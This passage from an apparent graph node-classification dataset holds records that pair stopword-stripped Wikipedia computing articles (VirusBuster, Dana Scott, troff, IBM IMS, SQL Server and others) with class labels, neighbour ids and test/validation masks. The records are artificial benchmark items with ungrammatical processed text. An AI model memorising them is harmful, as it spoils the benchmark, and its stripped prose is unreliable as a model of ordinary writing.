products services going removed market entire developing malware analyst team joined sophos virusbuster provided customized multi-level virus protection solutions – individual home size organizational – customer groups furthermore virusbuster internet security suite provides full it-protection home users company security products cover important operating systems including workstation server platforms. br according independent it-professionals international test labs products company pretty good solutions aspects speed efficiency security analysts said virusbuster user interface rather traditional according others almost old fashioned gui provides better transparency easier manageability according general opinions products company cover important business platforms protect every it-security threats beside retail solutions different market segments also important company antiviral engine became independent product several international companies licensing virusbuster technology integrated products outpost security suite kaspersky microsoft proteatools beside companies mentioned important strategic partners company different international collaboration projects beginning 2008 virusbuster security researchers found computer malware using name company trick users worm spreading attachment infected e-mails name virusbuster.personal.v3.20.regfile.by.arcade.exe analysis classification virus difficult task since worm variant well known rather old bagle malware family. br first example name misuse virusburst fake antispyware program 2006 name similar virusbusters name – probably accidentally another case similarity perfect br also 2008 29a virus-writing group announced shut one prominent members 29a team also used 'virusbuster alias",
    "neighbors": [
      7809,
      9665,
      2213,
      5384,
      3243,
      7948,
      4464,
      9055
    ],
    "mask": "None"
  },
  {
    "node_id": 11020,
    "label": 9,
    "text": "Dana_Scott:dana scott dana stewart scott born october 11 1932 emeritus hillman university professor computer science philosophy mathematical logic carnegie mellon university retired lives berkeley california research career involved computer science mathematics philosophy work automata theory earned acm turing award 1976 collaborative work christopher strachey 1970s laid foundations modern approaches semantics programming languages worked also modal logic topology category theory received ba mathematics university california berkeley 1954 wrote ph.d. thesis convergent sequences complete theories supervision alonzo church princeton defended thesis 1958 solomon feferman 2005 writes period completing ph.d. studies moved university chicago working instructor 1960 1959 published joint paper michael o. rabin colleague princeton titled finite automata decision problem scott rabin 1959 introduced idea nondeterministic machines automata theory work led joint bestowal turing award two introduction fundamental concept computational complexity theory scott took post assistant professor mathematics back university california berkeley involved classical issues mathematical logic especially set theory tarskian model theory period started supervising ph.d. students james halpern contributions study independence axiom choice edgar lopez-escobar infinitely long formulas countable quantifier degrees scott also began working modal logic period beginning collaboration john lemmon moved claremont california 1963 scott especially interested arthur prior approach tense logic connection treatment time natural-language semantics began collaborating richard montague copeland 2004 known days undergraduate berkeley later scott montague independently discovered important generalisation kripke semantics modal tense logic called scott-montague semantics scott 1970 john lemmon scott began work modal-logic textbook interrupted lemmon death 1966 scott circulated incomplete monograph amongst colleagues introducing number important techniques semantics model theory importantly presenting refinement canonical model became standard introducing technique constructing models filtrations core concepts modern kripke semantics blackburn de rijke venema 2001 scott eventually published work introduction modal logic lemmon scott 1977 following initial observation robert solovay scott formulated concept boolean-valued model solovay petr vopěnka likewise around time 1967 scott published paper proof independence continuum hypothesis used boolean-valued models provide alternate analysis independence continuum hypothesis provided paul cohen work led award leroy p. steele prize 1972 scott took post professor mathematical logic philosophy faculty university oxford 1972 member merton college oxford honorary fellow college period saw scott working christopher strachey two managed despite administrative pressures work providing mathematical foundation semantics programming languages work scott best known together work constitutes scott–strachey approach denotational semantics constitutes one pieces work theoretical computer science perhaps regarded founding one schools computer science one scott contributions formulation domain theory allowing programs involving recursive functions looping-control constructs given denotational semantics additionally provided foundation understanding infinitary continuous information domain theory theory information systems scott work period led bestowal carnegie mellon university scott proposed theory equilogical spaces successor theory domain theory among many advantages category equilogical spaces cartesian closed category whereas category domains 1994 inducted fellow association computing machinery 2012 became fellow american mathematical society",
    "neighbors": [
      7048,
      6306,
      10668,
      10031,
      2482,
      1976,
      1982,
      4799,
      4800,
      10049,
      4930,
      70,
      3529,
      5456,
      5585,
      3929,
      1883,
      7775,
      9315,
      11242,
      2283,
      2798,
      1783,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 11021,
    "label": 4,
    "text": "Peter_Tippett:peter tippett peter tippett born 1953 dearborn michigan american physician researcher inventor known contributions information security clinical medicine technology contributions include development anti-virus program corporate vaccine tippett vice president verizon innovations incubator chief medical officer verizon enterprise services 2009 2015 currently founder ceo healthcelerate inc. born 1953 raised dearborn michigan tippett alumnus kalamazoo college holds ph.d. m.d case western reserve university school medicine studied rockefeller university new york nobel prize winner robert bruce merrifield directing doctoral research efforts toward metabolic indicators peptide synthesis completed internship residency internal medicine cleveland metropolitan general hospital spent 1975-1985 engaged biochemical research engaged research case western reserve tippett moonlighted emergency room physician instructor emergency outpatient medicine spent much early clinical career 1989-1995 emergency medicine ohio california received board certification internal medicine 1987 1993 2000 served board computer ethics institute served executive director pacific foundation science medicine 1988 1992 intersection clinical career emerging focus technology particularly arena cybersecurity well use access protocols internet role president chairman certus international publisher developer pc anti-virus security software tippett applied research insights biochemist concept computer viruses develop anti-virus software vaccine later purchased symantec 1992 ceo role cybertrust led merger cybertrust verizon tippett role verizon healthcare security innovations divisions tippett served chairman alliance internet security 2000 represented verizon board directors open identity exchange oix information card foundation addition credited development one first anti-virus programs vaccine tippett pioneered commercialized string now-common technologies including called recovery disk processor image signatures using hash-tables trusted file execution anomaly detection aspects mail merge un-do ran bulletin board system cp/m software first ibm pc created president cleveland osborne group user group computers osborne computer corporation early 1980s chief scientist icsa.net tippett one handful experts identify address iloveyou virus broke may 2000 provided key information department justice david smith writer melissa virus featured cover august 2000 issue time digital magazine tippett work cybersecurity space led roles speaker contributor advisor government private sector organizations 2003-2005 served president information technology committee pitac established congress 1997 high performance computing act 1991 guide administration efforts accelerate development adoption information technologies vital american prosperity 21st century u.s. chamber commerce awarded tippett first leadership health care award chamber ’ first annual health care summit 2012 leadership verizon incubator tippett also chief scientist icsa labs previously served president international computer security association tippett currently adjunct professor division general medical sciences case western reserve university school medicine november 2017 t.e.n. technology information security executive networking relationship-marketing firm announced tippett recipient 2017 ise® luminary leadership award",
    "neighbors": [
      9569,
      2213,
      8807,
      6516,
      4409,
      5373,
      30
    ],
    "mask": "Test"
  },
  {
    "node_id": 11022,
    "label": 4,
    "text": "Transshipment_(information_security):transshipment information security information security transshipment technique protecting software services applications ensuring receive data known able handle safely term analogous logistics industry cargo offloaded one means transport another port entry transshipment information extracted data used send encoded data handled safely transshipment messages intercepted business information carry extracted information encoded new message using data format receiving application safely handle example email client may known handle messages simple structure without failure full generality allowed standards transshipment used protect mail client attackers exploit weaknesses ability handle general case transshipment process extracts business information email messages creates new message conveys information using simple structures mail client protected without knowing details weaknesses implementation transshipment function must handle data sent potential attackers useful function must implemented without vulnerable attack achieved using guard technology separates implementation three parts destination proxy interacts message originator extracts business information messages verifier source proxy creates new message carry business information interacts message recipient verifier role ensure source proxy presented business information using simple data format expecting result attack surface limited verifier interface part source proxy interface visible verifier unlike antivirus software use transshipment defends unknown attacks hence zero-day attacks require routine updates signatures heuristics",
    "neighbors": [
      5636,
      2213,
      3930,
      5373,
      8094
    ],
    "mask": "Test"
  },
  {
    "node_id": 11023,
    "label": 9,
    "text": "Troff:troff troff short typesetter roff major component document processing system developed corporation unix operating system troff features commands designate fonts spacing paragraphs margins footnotes unlike many text formatters troff position characters arbitrarily page even overlapping fully programmable input language separate preprocessors used convenient production tables diagrams mathematics inputs troff plain text files created text editor extensive macro packages created various document styles typical distribution troff includes macros formatting research papers man mdoc macros creating unix man pages mv macros creating mountable transparencies ms mm macros letters books technical memoranda reports troff origins traced text-formatting program called runoff written jerome h. saltzer mit ctss operating system mid-1960s name allegedly came phrase 'll run document bob morris ported ge 635 architecture called program roff abbreviation runoff rewritten rf pdp-7 time 1969 doug mcilroy rewrote extended simplified version roff bcpl programming language first version unix developed pdp-7 sitting around bell labs 1971 developers wanted get pdp-11 work operating system order justify cost system proposed would implement document-formatting system patents division first formatting program reimplementation mcillroy roff written joe f. ossanna needed flexible language new version roff called nroff newer roff written provided basis future versions got graphic systems cat phototypesetter ossanna modified nroff support multiple fonts proportional spacing dubbed troff typesetter roff sophisticated output amazed typesetter manufacturer confused peer reviewers thought manuscripts using troff published name troff pronounced rather troff came nroff actually almost program producing output line printers character terminals understood everything troff ignored commands applicable e.g. font changes ossanna troff written pdp-11 assembly language produced output specifically cat phototypesetter rewrote c although 7000 lines uncommented code still dependent cat cat became less common longer supported manufacturer need make support devices became priority ossanna died task completed brian kernighan took task rewriting troff newly rewritten version produced device-independent code easy post-processors read translate appropriate printer codes also new version troff often called ditroff device independent troff several extensions included drawing functions program documentation defines output format ditroff used many modern troff clones like gnu groff troff collection tools including pre- post-processors eventually called documenter workbench dwb continuous development bell labs later spin-off unix system laboratories usl 1994 time softquad took maintenance although brian kernighan continued improve troff thus least following variants original bell labs troff use troff supplanted programs interleaf framemaker latex still used quite extensively remains default formatter unix documentation software reimplemented groff gnu system beginning 1990 addition due open sourcing ancient unix systems well modern successors ditroff based open-sourced versions found opensolaris plan 9 bell labs several versions troff cat ditroff-based available various open-source licenses troff includes sets commands called macros run starting process document macros include setting page headers footers defining new commands generally influencing output formatted command-line argument including macro set -m name led many macro sets known base filename leading m. standard macro sets leading comprehensive list macros available usually listed codice_2 manual page troff evolved since several things done easily troff several preprocessors developed programs transform certain parts document troff input fitting naturally use pipelines unix — sending output one program input another see pipes filters typically preprocessor translates sections input file specially marked passing rest file unchanged embedded preprocessing instructions written simple application-specific programming language provides high degree power flexibility three preprocessors provide troff drawing capabilities defining domain-specific language describing picture yet preprocessors allow drawing complex pictures generating output pic",
    "neighbors": [
      5896,
      9,
      7188,
      5397,
      6304,
      5418,
      7983,
      8879,
      310,
      823,
      3134,
      319,
      1347,
      9027,
      1349,
      8262,
      9926,
      9419,
      4433,
      9298,
      2132,
      4564,
      345,
      477,
      6369,
      10083,
      11363,
      10732,
      7539,
      5492,
      9075,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11024,
    "label": 1,
    "text": "IBM_Information_Management_System:ibm information management system ibm information management system ims joint hierarchical database information management system extensive transaction processing capabilities ibm designed ims rockwell caterpillar starting 1966 apollo program used inventory large bill materials bom saturn v moon rocket apollo space vehicle first ims ready message appeared ibm 2740 terminal downey california august 14 1968 interim period ims undergone many developments ibm system/360 technology evolved current z/os ibm zenterprise system technologies example ims supports java programming language jdbc xml since late 2005 web services vern watts ims chief architect many years watts joined ibm 1956 worked ibm silicon valley development labs death april 4 2009 continuously worked ims since 1960s ims database component stores data using hierarchical model quite different ibm later released relational database db2 ims hierarchical model implemented using blocks data known segments segment contain several pieces data called fields example customer database may root segment segment top hierarchy fields phone name age child segments may added underneath another segment instance one order segment customer segment representing order customer placed company likewise order segment may many children segments item order unlike databases need define data segment ims segment may defined size 40 bytes define one field six bytes long key field use find segment performing queries ims retrieve save 40 bytes directed program may understand care bytes represent practice often data segment may map cobol copybook besides dl/i query usage field may defined ims data hidden certain applications security reasons database component ims purchased standalone without transaction manager component used systems cics three basic forms ims hierarchical databases dedb performance comes use high performance media manager access method asynchronous write commit optimized code paths logging minimized data updated disk commit undo image logging needed backout function uncommitted changes simply discarded starting ims version 11 dedbs use z/os 64-bit storage database buffers dedbs architecture includes unit work uow concept made effective online reorganization utility simple implement function included base product fast path dedbs built atop vsam dl/i databases built atop either vsam osam restrictions depending database organization although maximum size z/os vsam dataset increased 128 tb years ago ims still limits vsam dataset 4 gb osam 8 gb limitation simply means ims customers use multiple datasets large amounts data vsam osam usually referred access methods ims logical view database referred database organization hdam hidam hisam etc internally data linked using 4-byte pointers addresses database datasets dbdss pointers referred rbas relative byte addresses collectively database-related ims capabilities often called ims db ims db grown evolved nearly four decades support myriad business needs ims assistance z/os hardware coupling facility supports n-way inter-ims sharing databases many large configurations involve multiple ims systems managing common databases technique providing scalable growth system redundancy event hardware software failures ims also robust transaction manager ims tm also known ims dc one big three classic transaction managers along cics bea oracle tuxedo transaction manager interacts end user connected vtam tcp/ip including 3270 web user interfaces another application processes business function banking account withdrawal maintains state throughout process making sure system records business function correctly data store thus ims tm quite like web application operating cgi program example provide interface query update database ims tm typically uses either ims db db2 backend database used alone db2 ims tm component purchased without ims db component ims tm uses messaging queuing paradigm ims control program receives transaction entered terminal web browser application stores transaction message queue memory dataset ims invokes scheduler queued transaction start business application program message processing region message processing region retrieves transaction ims message queue processes reading updating ims and/or db2 databases assuring proper recording transaction required ims enqueues response message back onto ims message queue output message complete available ims control program sends back originating terminal ims tm handle whole process thousands even tens thousands times per second 2013 ibm completed benchmark ims version 13 demonstrating ability process 100,000 transactions per second single ims system prior ims businesses governments write transaction processing environments ims tm provides straightforward easy-to-use reliable standard environment high performance transaction execution fact much world banking industry relies ims including u.s. federal reserve example chances withdrawing money automated teller machine atm trigger ims transaction several chinese banks recently purchased ims support country burgeoning financial industry today ims complements db2 ibm relational database system introduced 1982 general ims performs faster db2 common tasks may require programming effort design maintain non-primary duties relational databases generally proven superior cases requirements especially reporting requirements change frequently require variety viewpoint angles outside primary original function relational data warehouse may used supplement ims database example ims may provide primary atm transactions performs well specific task however nightly copies ims data may copied relational systems variety reports processing tasks may performed data allows kind database focus best relative strength",
    "neighbors": [
      10883,
      7053,
      11541,
      4630,
      5658,
      284,
      4255,
      9631,
      7076,
      5677,
      10413,
      7983,
      4913,
      9138,
      2485,
      3894,
      8502,
      9397,
      9782,
      5562,
      5051,
      10040,
      10048,
      4546,
      6850,
      11131,
      3398,
      9286,
      2901,
      10072,
      479,
      863,
      7650,
      868,
      10471,
      3816,
      2168,
      7930,
      6395
    ],
    "mask": "None"
  },
  {
    "node_id": 11025,
    "label": 7,
    "text": "Maxisun:maxisun maxisun interface system infor sunsystems/sap business one/other erp systems third party business applications original maxisun software developed integrate maximo sunsystems 2001 sapphire systems early versions software “ black box ” systems little could modified client installation taken place history always two main components comprising system data extraction component data conversion component first version system data extraction component sqr script authored originally mro software sapphire data transformation engine originally authored sapphire visual basic since early days maxisun modified make capable configured client sqr extraction tool replaced dedicated program called origin maxisun data conversion engine gained benefit user interface allowed source destination files mapped field line level mapping settings needed dynamic storage facility created using microsoft access database initially later upgraded sql server etl describes methodology behind maxisun middleware interface task broken three distinct parts 1 extract extraction phase records meeting certain pre-defined criteria extracted source system ’ database either series files file system typically xml csv files memory case certain specific interfaces 2 transform transformation phase file data data memory manipulated series rules meet data entry requirements destination system manipulations include limited trimming fields given length creating balanced double entry records performing calculations joining values together etc maxisun supports range standard data manipulation features right box since full user definable .net macro capability literally transformation achieved 3 load load phase transformed data uploaded end point application method appropriate application typically applications receiving data perform level validation data sometimes feedback result sending application examples loading transactions sunsystems via sun systems connect ssc web service loading data maximo interface tables maximo enterprise adapter mea version 7 maximo integration framework mif validates processes data application tables maxisun combines extraction transformation tasks one action – speeds process dramatically means fewer steps interface task check event issue maxisun middleware creates integration hub enabling point point integrations two third party systems uses number methods communicate systems fully configurable perform etl extract transform load tasks meet individual interfacing requirements given third party applications",
    "neighbors": [
      8122,
      7523,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 11026,
    "label": 9,
    "text": "Isabelle_(proof_assistant):isabelle proof assistant isabelle automated theorem prover interactive theorem prover higher order logic hol theorem prover lcf-style theorem prover written standard ml based small logical core ease logical correctness isabelle generic provides meta-logic weak type theory used encode object logics like first-order logic fol higher-order logic hol zermelo–fraenkel set theory zfc isabelle main proof method higher-order version resolution based higher-order unification though interactive isabelle also features efficient automatic reasoning tools term rewriting engine tableaux prover well various decision procedures isabelle used formalize numerous theorems mathematics computer science like gödel completeness theorem gödel theorem consistency axiom choice prime number theorem correctness security protocols properties programming language semantics isabelle theorem prover free software released revised bsd license isabelle named lawrence paulson gérard huet daughter isabelle allows proofs written two different styles procedural declarative procedural proofs specify series tactics procedures apply reflecting procedure human mathematician might apply proving result typically hard read describe outcome steps declarative proofs supported isabelle proof language isar hand specify actual mathematical operations performed therefore easily read checked humans procedural style deprecated recent versions isabelle archive formal proofs also recommends declarative style example declarative proof contradiction isar square root two rational written follows isabelle used aid formal methods specification development verification software hardware systems larry paulson keeps list research projects use isabelle following programs provide similar functionality isabelle",
    "neighbors": [
      823,
      7983,
      11032,
      7187,
      11028,
      4791,
      9816,
      3705,
      1019,
      8924,
      10813,
      4446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11027,
    "label": 7,
    "text": "Quasi-opportunistic_supercomputing:quasi-opportunistic supercomputing quasi-opportunistic supercomputing computational paradigm supercomputing large number geographically disperse computers quasi-opportunistic supercomputing aims provide higher quality service opportunistic resource sharing quasi-opportunistic approach coordinates computers often different ownerships achieve reliable fault-tolerant high performance control opportunistic computer grids computational resources used whenever may become available opportunistic match-making approach task scheduling computer grids simpler merely matches tasks whatever resources may available given time demanding supercomputer applications weather simulations computational fluid dynamics remained reach partly due barriers reliable sub-assignment large number tasks well reliable availability resources given time quasi-opportunistic approach enables execution demanding applications within computer grids establishing grid-wise resource allocation agreements fault tolerant message passing abstractly shield failures underlying resources thus maintaining opportunism allowing higher level control general principle grid computing use distributed computing resources diverse administrative domains solve single task using resources become available traditionally grid systems approached task scheduling challenge using opportunistic match-making approach tasks matched whatever resources may available given time boinc developed university california berkeley example volunteer-based opportunistic grid computing system applications based boinc grid reached multi-petaflop levels using close half million computers connected internet whenever volunteer resources become available another system folding home based boinc computes protein folding reached 8.8 petaflops using clients include gpu playstation 3 systems however results applicable top500 ratings run general purpose linpack benchmark key strategy grid computing use middleware partitions pieces program among different computers network although general grid computing success parallel task execution demanding supercomputer applications weather simulations computational fluid dynamics remained reach partly due barriers reliable sub-assignment large number tasks well reliable availability resources given time opportunistic internet primenet server supports gimps one earliest grid computing projects since 1997 researching mersenne prime numbers gimps distributed research currently achieves 60 teraflops volunteer-based computing project use computing resources volunteer grids gimps usually purely opportunistic geographically disperse distributively owned computers contributing whenever become available preset commitments resources available given time hence hypothetically many volunteers unwittingly decide switch computers certain day grid resources become significantly reduced furthermore users find exceedingly costly organize large number opportunistic computing resources manner achieve reasonable high performance computing example structured grid high performance computing deisa supercomputer project organized european community uses computers seven european countries although different parts program executing within deisa may running computers located different countries different ownerships administrations control coordination purely opportunistic approach deisa two level integration scheme inner level consists number strongly connected high performance computer clusters share similar operating systems scheduling mechanisms provide homogeneous computing environment outer level consists heterogeneous systems supercomputing capabilities thus deisa provide somewhat controlled yet dispersed high performance computing services users quasi-opportunistic paradigm aims overcome achieving control assignment tasks distributed resources use pre-negotiated scenarios availability systems within network quasi-opportunistic distributed execution demanding parallel computing software grids focuses implementation grid-wise allocation agreements co-allocation subsystems communication topology-aware allocation mechanisms fault tolerant message passing libraries data pre-conditioning approach fault tolerant message passing essential abstractly shield failures underlying resources quasi-opportunistic approach goes beyond volunteer computing highly distributed systems boinc general grid computing system globus allowing middleware provide almost seamless access many computing clusters existing programs languages fortran c distributed among multiple computing resources key component quasi-opportunistic approach qoscos grid economic-based resource allocation model resources provided based agreements among specific supercomputer administration sites unlike volunteer systems rely altruism specific contractual terms stipulated performance specific types tasks however tit-for-tat paradigms computations paid back via future computations suitable supercomputing applications avoided key component quasi-opportunistic approach reliable message passing system provide distributed checkpoint restart mechanisms computer hardware networks inevitably experience failures way part large computation fails entire run need abandoned restart last saved checkpoint",
    "neighbors": [
      8122,
      5956,
      5029,
      1480,
      7497,
      8937,
      6421,
      11353,
      2394,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 11028,
    "label": 9,
    "text": "HOL_(proof_assistant):hol proof assistant hol higher order logic denotes family interactive theorem proving systems using similar higher-order logics implementation strategies systems family follow lcf approach implemented library programming language library implements abstract data type proven theorems new objects type created using functions library correspond inference rules higher-order logic long functions correctly implemented theorems proven system must valid way large system built top small trusted kernel systems hol family use ml programming language successors ml originally developed along lcf serve purpose meta-language theorem proving systems fact name stands meta-language hol systems use variants classical higher-order logic simple axiomatic foundations axioms well-understood semantics logic used hol provers closely related isabelle/hol widely used logic isabelle four hol systems sharing essentially logic still maintained developed although hol predecessor isabelle various hol derivatives hol4 hol light remain active use cakeml project developed formally proven compiler ml previously hol used developed formally proven lisp implementation running arm x86 powerpc hol also used develop formal semantics x86 multiprocessors well semantics machine code power isa arm architectures",
    "neighbors": [
      4612,
      6502,
      9320,
      9865,
      10985,
      9964,
      2062,
      7185,
      11026,
      4791,
      11032,
      7386,
      1019,
      8924
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11029,
    "label": 5,
    "text": "BitTorrent_tracker:bittorrent tracker bittorrent tracker special type server assists communication peers using bittorrent protocol peer-to-peer file sharing software client end-user pc requests file portions requested file residing peer machines sent client reassembled full copy requested file tracker server keeps track file copies reside peer machines ones available time client request helps coordinate efficient transmission reassembly copied file clients already begun downloading file communicate tracker periodically negotiate faster file transfer new peers provide network performance statistics however initial peer-to-peer file download started peer-to-peer communication continue without connection tracker since creation distributed hash table dht method trackerless torrents bittorrent trackers largely become redundant however still often included torrents improve speed peer discovery public open trackers used anyone adding tracker address existing torrent used newly created torrent like openbittorrent pirate bay operated one popular public trackers disabling 2009 amid legal trouble thereafter offered magnet links private tracker bittorrent tracker restricts use requiring users register site method controlling registration used among many private trackers invitation system active contributing members given ability grant new user permission register site new user goes interview process several circumstances legal distribute copyrighted material parts thereof also experiments legally selling content distributed bittorrent using secure tracker system trackers primary reason damaged bittorrent swarm reasons mostly related damaged hacked clients uploading corrupt data reliability trackers improved two main innovations bittorrent protocol multi-tracker torrents contain multiple trackers single torrent file provides redundancy case one tracker fails trackers continue maintain swarm torrent one disadvantage becomes possible multiple unconnected swarms single torrent users connect one specific tracker unable connect another create disjoint set impede efficiency torrent transfer files describes additional extensions peer exchange dht mitigate effect rapidly merging otherwise disjoint graphs peers vuze formerly azureus first bittorrent client implement system distributed hash table dht method alternative incompatible dht system known mainline dht developed simultaneously later adopted bittorrent mainline µtorrent transmission rtorrent ktorrent bitcomet deluge clients current versions official bittorrent client µtorrent bitcomet transmission bitspirit share compatibility mainline dht dht implementations based kademlia version 3.0.5.0 vuze also supports mainline dht addition distributed database use optional application plugin mainlinedht plugin potentially allows vuze client reach bigger swarm bittorrent clients also use peer exchange pex gather peers addition trackers dht peer exchange checks known peers see know peers 3.0.5.0 release vuze major bittorrent clients compatible peer exchange one options http based tracker protocol compact flag flag defined bep 23 specifies tracker compact response encoding ipv4 addresses set 4 bytes 32 bits ipv6 though 128 bits long compact would break ipv6 support handle situation clients trackers must either avoid using compact announces ipv6 implement bep 07 opentracker dirk engling powered one biggest bittorrent trackers pirate bay tracker atrack high performance open source tracker designed run google app engine bitstorm small tracker written php require database server runs php compatible web server bitstorm 2 uses mysql database instead flat file improve scalability bittorious open source commercially supported tracker integrated web-based management portal hefur standalone bittorrent tracker written c++ mit license ocelot bittorrent tracker written c++ gazelle project",
    "neighbors": [
      4229,
      4490,
      1172,
      11413,
      10522,
      157,
      10924,
      8640,
      11073,
      708,
      6351,
      6991,
      7761,
      3676,
      5085,
      5469,
      5470,
      5344,
      3428,
      3813,
      7022,
      10995,
      1908,
      9332
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11030,
    "label": 1,
    "text": "Microsoft_SQL_Server:microsoft sql server microsoft sql server relational database management system developed microsoft database server software product primary function storing retrieving data requested software applications—which may run either computer another computer across network including internet microsoft markets least dozen different editions microsoft sql server aimed different audiences workloads ranging small single-machine applications large internet-facing applications many concurrent users history microsoft sql server begins first microsoft sql server product—sql server 1.0 16-bit server os/2 operating system 1989—and extends current day following versions supported microsoft sql server 2016 onward product supported x64 processors current version microsoft sql server 2017 released october 2 2017 rtm version 14.1709.3807.1 sql server 2019 released community technology preview slated release manufacturing second half 2019 microsoft makes sql server available multiple editions different feature sets targeting different users editions protocol layer implements external interface sql server operations invoked sql server communicated via microsoft-defined format called tabular data stream tds tds application layer protocol used transfer data database server client initially designed developed sybase inc. sybase sql server relational database engine 1984 later microsoft microsoft sql server tds packets encased physical transport dependent protocols including tcp/ip named pipes shared memory consequently access sql server available protocols addition sql server api also exposed web services data storage database collection tables typed columns sql server supports different data types including primitive types integer float decimal char including character strings varchar variable length character strings binary unstructured blobs data text textual data among others rounding floats integers uses either symmetric arithmetic rounding symmetric round fix depending arguments codice_1 gives 3 microsoft sql server also allows user-defined composite types udts defined used also makes server statistics available virtual tables views called dynamic management views dmvs addition tables database also contain objects including views stored procedures indexes constraints along transaction log sql server database contain maximum 2 objects span multiple os-level files maximum file size 2 bytes 1 exabyte data database stored primary data files extension codice_2 secondary data files identified codice_3 extension used allow data single database spread across one file optionally across one file system log files identified codice_4 extension storage space allocated database divided sequentially numbered pages 8 kb size page basic unit i/o sql server operations page marked 96-byte header stores metadata page including page number page type free space page id object owns page type defines data contained page data stored database index allocation map holds information pages allocated tables indexes change map holds information changes made pages since last backup logging contain large data types image text page basic unit i/o operation space actually managed terms extent consists 8 pages database object either span 8 pages extent uniform extent share extent 7 objects mixed extent row database table span one page limited 8 kb size however data exceeds 8 kb row contains varchar varbinary data data columns moved new page possibly sequence pages called allocation unit replaced pointer data physical storage table rows divided series partitions numbered 1 n partition size user defined default rows single partition table split multiple partitions order spread database computer cluster rows partition stored either b-tree heap structure table associated clustered index allow fast retrieval rows rows stored in-order according index values b-tree providing index data leaf node leaves nodes storing index values leaf data reachable respective nodes index non-clustered rows sorted according index keys indexed view storage structure indexed table table without clustered index stored unordered heap structure however table may non-clustered indices allow fast retrieval rows situations heap structure performance advantages clustered structure heaps b-trees span multiple allocation units sql server buffers pages ram minimize disk i/o 8 kb page buffered in-memory set pages currently buffered called buffer cache amount memory available sql server decides many pages cached memory buffer cache managed buffer manager either reading writing page copies buffer cache subsequent reads writes redirected in-memory copy rather on-disc version page updated disc buffer manager in-memory cache referenced time writing pages back disc asynchronous i/o used whereby i/o operation done background thread operations wait i/o operation complete page written along checksum written reading page back checksum computed matched stored version ensure page damaged tampered meantime sql server allows multiple clients use database concurrently needs control concurrent access shared data ensure data integrity—when multiple clients update data clients attempt read data process changed another client sql server provides two modes concurrency control pessimistic concurrency optimistic concurrency pessimistic concurrency control used sql server controls concurrent access using locks locks either shared exclusive exclusive lock grants user exclusive access data—no user access data long lock held shared locks used data read—multiple users read data locked shared lock acquire exclusive lock latter would wait shared locks released locks applied different levels granularity—on entire tables pages even per-row basis tables indexes either entire index index leaves level granularity used defined per-database basis database administrator fine-grained locking system allows users use table index simultaneously requires resources automatically yield higher performance sql server also includes two lightweight mutual exclusion solutions—latches spinlocks—which less robust locks less resource intensive sql server uses dmvs resources usually busy sql server also monitors worker threads acquire locks ensure end deadlocks—in case sql server takes remedial measures many cases kill one threads entangled deadlock roll back transaction started implement locking sql server contains lock manager lock manager maintains in-memory table manages database objects locks along metadata lock access shared object mediated lock manager either grants access resource blocks sql server also provides optimistic concurrency control mechanism similar multiversion concurrency control used databases mechanism allows new version row created whenever row updated opposed overwriting row i.e. row additionally identified id transaction created version row old well new versions row stored maintained though old versions moved database system database identified codice_5 row process updated requests blocked unlike locking executed older version row request update statement result two different versions rows—both stored database identified respective transaction ids main mode retrieving data sql server database querying query expressed using variant sql called t-sql dialect microsoft sql server shares sybase sql server due legacy query declaratively specifies retrieved processed query processor figures sequence steps necessary retrieve requested data sequence actions necessary execute query called query plan might multiple ways process query example query contains join statement select statement executing join tables executing select results would give result selecting table executing join result different execution plans case sql server chooses plan expected yield results shortest possible time called query optimization performed query processor sql server includes cost-based query optimizer tries optimize cost terms resources take execute query given query query optimizer looks database schema database statistics system load time decides sequence access tables referred query sequence execute operations access method used access tables example table associated index whether index used index column unique columns low selectivity might worthwhile use index access data finally decides whether execute query concurrently concurrent execution costly terms total processor time execution actually split different processors might mean execute faster query plan generated query temporarily cached invocations query cached plan used unused plans discarded time sql server also allows stored procedures defined stored procedures parameterized t-sql queries stored server issued client application case general queries stored procedures accept values sent client input parameters send back results output parameters call defined functions stored procedures including stored procedure set number times selectively provided access unlike queries stored procedures associated name used runtime resolve actual queries also code need sent client every time accessed name reduces network traffic somewhat improves performance execution plans stored procedures also cached necessary t-sql transact-sql microsoft proprietary procedural language extension sql server provides repl read-eval-print-loop instructions extend standard sql instruction set data manipulation dml data definition ddl instructions including sql server-specific settings security database statistics management exposes keywords operations performed sql server including creating altering database schemas entering editing data database well monitoring managing server client applications consume data manage server leverage sql server functionality sending t-sql queries statements processed server results errors returned client application exposes read-only tables server statistics read management functionality exposed via system-defined stored procedures invoked t-sql queries perform management operation also possible create linked servers using t-sql linked servers allow single query process operations performed multiple servers sql server native client native client side data access library microsoft sql server version 2005 onwards natively implements support sql server features including tabular data stream implementation support mirrored sql server databases full support data types supported sql server asynchronous operations query notifications encryption support well receiving multiple result sets single database session sql server native client used hood sql server plug-ins data access technologies including ado ole db sql server native client also directly used bypassing generic data access layers november 28 2011 preview release sql server odbc driver linux released microsoft sql server 2005 includes component named sql clr common language runtime via integrates .net framework unlike applications use .net framework sql server hosts .net framework runtime i.e. memory threading resource management requirements .net framework satisfied sqlos rather underlying windows operating system sqlos provides deadlock detection resolution services .net code well sql clr stored procedures triggers written managed .net language including c vb.net managed code also used define udt user defined types persist database managed code compiled cli assemblies verified type safety registered database invoked like procedure however subset base class library available running code sql clr apis relating user interface functionality available writing code sql clr data stored sql server databases accessed using ado.net apis like managed application accesses sql server data however creates new database session different one code executing avoid sql server provides enhancements ado.net provider allows connection redirected session already hosts running code connections called context connections set setting codice_6 parameter codice_7 connection string sql server also provides several enhancements ado.net api including classes work tabular data single row data well classes work internal metadata data stored database also provides access xml features sql server including xquery support enhancements also available t-sql procedures consequence introduction new xml datatype query value nodes functions sql server also includes assortment add-on services essential operation database system provide value added services top core database management system services either run part sql server component out-of-process windows service presents api control interact sql server machine learning services operates within sql server instance allowing people machine learning data analytics without send data across network limited memory computers services come microsoft r python distributions contain commonly used packages data science along proprietary packages e.g revoscalepy revoscaler microsoftml used create machine models scale analysts either configure client machine connect remote sql server push script executions run r python scripts external script inside t-sql query trained machine learning model stored inside database used scoring used inside instance programming environment cross-instance applications service broker communicates tcp/ip allows different components synchronized via exchange messages service broker runs part database engine provides reliable messaging message queuing platform sql server applications sql server replication services used sql server replicate synchronize database objects either entirety subset objects present across replication agents might database servers across network database caches client side lulla follows publisher/subscriber model i.e. changes sent one database server publisher received others subscribers sql server supports three different types replication sql server analysis services adds 